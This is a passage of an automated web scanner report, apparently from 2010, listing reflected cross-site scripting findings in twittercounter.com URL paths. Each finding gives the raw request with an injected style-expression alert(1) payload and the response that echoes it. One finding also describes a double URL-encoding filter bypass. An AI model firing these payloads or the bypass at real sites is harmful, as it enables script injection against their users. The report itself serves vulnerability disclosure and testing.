GET /anapdealmeida3e97a"style%3d"x%3aexpression(alert(1))"9e7c6156d52?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:16 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/anapdealmeida3e97a"style="x:expression(alert(1))"9e7c6156d52" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72514"style%3d"x%3aexpression(alert(1))"1113e39ac4 was submitted in the REST URL parameter 1. This input was echoed as 72514"style="x:expression(alert(1))"1113e39ac4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /anascarpim72514"style%3d"x%3aexpression(alert(1))"1113e39ac4 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:13 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/anascarpim72514"style="x:expression(alert(1))"1113e39ac4" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab23"style%3d"x%3aexpression(alert(1))"3eaaeea5dac was submitted in the REST URL parameter 1. This input was echoed as 7ab23"style="x:expression(alert(1))"3eaaeea5dac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /aplusk7ab23"style%3d"x%3aexpression(alert(1))"3eaaeea5dac HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:13 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23686
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/aplusk7ab23"style="x:expression(alert(1))"3eaaeea5dac" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4652"style%3d"x%3aexpression(alert(1))"d28cffbc26e was submitted in the REST URL parameter 1. This input was echoed as b4652"style="x:expression(alert(1))"d28cffbc26e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /ashleytisdaleb4652"style%3d"x%3aexpression(alert(1))"d28cffbc26e HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:17 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/ashleytisdaleb4652"style="x:expression(alert(1))"d28cffbc26e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfaa8"style%3d"x%3aexpression(alert(1))"97beba50459 was submitted in the REST URL parameter 1. This input was echoed as bfaa8"style="x:expression(alert(1))"97beba50459 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /asterfrbfaa8"style%3d"x%3aexpression(alert(1))"97beba50459 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:28 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/asterfrbfaa8"style="x:expression(alert(1))"97beba50459" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87395"style%3d"x%3aexpression(alert(1))"301ba39cfa2 was submitted in the REST URL parameter 1. This input was echoed as 87395"style="x:expression(alert(1))"301ba39cfa2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bieberarmy87395"style%3d"x%3aexpression(alert(1))"301ba39cfa2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:23 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/bieberarmy87395"style="x:expression(alert(1))"301ba39cfa2" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69565"style%3d"x%3aexpression(alert(1))"a2ad55d45ca was submitted in the REST URL parameter 1. This input was echoed as 69565"style="x:expression(alert(1))"a2ad55d45ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bieberarmy69565"style%3d"x%3aexpression(alert(1))"a2ad55d45ca/list/justinfollowplease HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:51 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/bieberarmy69565"style="x:expression(alert(1))"a2ad55d45ca/list/justinfollowplease" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc767"style%3d"x%3aexpression(alert(1))"764c98472b1 was submitted in the REST URL parameter 2. This input was echoed as fc767"style="x:expression(alert(1))"764c98472b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bieberarmy/listfc767"style%3d"x%3aexpression(alert(1))"764c98472b1/justinfollowplease HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:53 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/bieberarmy/listfc767"style="x:expression(alert(1))"764c98472b1/justinfollowplease" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f360"style%3d"x%3aexpression(alert(1))"26d35274cd2 was submitted in the REST URL parameter 3. This input was echoed as 4f360"style="x:expression(alert(1))"26d35274cd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bieberarmy/list/justinfollowplease4f360"style%3d"x%3aexpression(alert(1))"26d35274cd2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:02 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12169
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/bieberarmy/list/justinfollowplease4f360"style="x:expression(alert(1))"26d35274cd2" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda3b"style%3d"x%3aexpression(alert(1))"77be440de32 was submitted in the REST URL parameter 1. This input was echoed as cda3b"style="x:expression(alert(1))"77be440de32 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blogcda3b"style%3d"x%3aexpression(alert(1))"77be440de32 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:22:33 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/blogcda3b"style="x:expression(alert(1))"77be440de32" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2574d"style%3d"x%3aexpression(alert(1))"841d348dd93 was submitted in the REST URL parameter 1. This input was echoed as 2574d"style="x:expression(alert(1))"841d348dd93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /britneyspears2574d"style%3d"x%3aexpression(alert(1))"841d348dd93 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:37 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/britneyspears2574d"style="x:expression(alert(1))"841d348dd93" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3090"style%3d"x%3aexpression(alert(1))"f47efa4686e was submitted in the REST URL parameter 1. This input was echoed as c3090"style="x:expression(alert(1))"f47efa4686e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /comparec3090"style%3d"x%3aexpression(alert(1))"f47efa4686e/ABTD/3month/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:06 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23892
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/comparec3090"style="x:expression(alert(1))"f47efa4686e/ABTD/3month/followers" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d1e"style%3d"x%3aexpression(alert(1))"0896668e1bd was submitted in the REST URL parameter 2. This input was echoed as c3d1e"style="x:expression(alert(1))"0896668e1bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTDc3d1e"style%3d"x%3aexpression(alert(1))"0896668e1bd/3month/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:11 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23818
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTDc3d1e"style="x:expression(alert(1))"0896668e1bd/3month/followers" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44cef"style%3d"x%3aexpression(alert(1))"5c282f2c80f was submitted in the REST URL parameter 3. This input was echoed as 44cef"style="x:expression(alert(1))"5c282f2c80f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/3month44cef"style%3d"x%3aexpression(alert(1))"5c282f2c80f/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:18 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/3month44cef"style="x:expression(alert(1))"5c282f2c80f/followers" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7891c"style%3d"x%3aexpression(alert(1))"b91a825fa21 was submitted in the REST URL parameter 4. This input was echoed as 7891c"style="x:expression(alert(1))"b91a825fa21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/3month/followers7891c"style%3d"x%3aexpression(alert(1))"b91a825fa21 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:22 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22211
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD/3month/followers7891c"style="x:expression(alert(1))"b91a825fa21" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9607"style%3d"x%3aexpression(alert(1))"88c55b57058 was submitted in the REST URL parameter 1. This input was echoed as b9607"style="x:expression(alert(1))"88c55b57058 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compareb9607"style%3d"x%3aexpression(alert(1))"88c55b57058/ABTD/month/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:03 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compareb9607"style="x:expression(alert(1))"88c55b57058/ABTD/month/followers" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f565"style%3d"x%3aexpression(alert(1))"9b6f40d88d0 was submitted in the REST URL parameter 2. This input was echoed as 5f565"style="x:expression(alert(1))"9b6f40d88d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD5f565"style%3d"x%3aexpression(alert(1))"9b6f40d88d0/month/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:10 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/compare/ABTD5f565"style="x:expression(alert(1))"9b6f40d88d0/month/followers" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97f2c"style%3d"x%3aexpression(alert(1))"33c0cb4e2b4 was submitted in the REST URL parameter 3. This input was echoed as 97f2c"style="x:expression(alert(1))"33c0cb4e2b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /compare/ABTD/month97f2c"style%3d"x%3aexpression(alert(1))"33c0cb4e2b4/followers HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:17 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22213
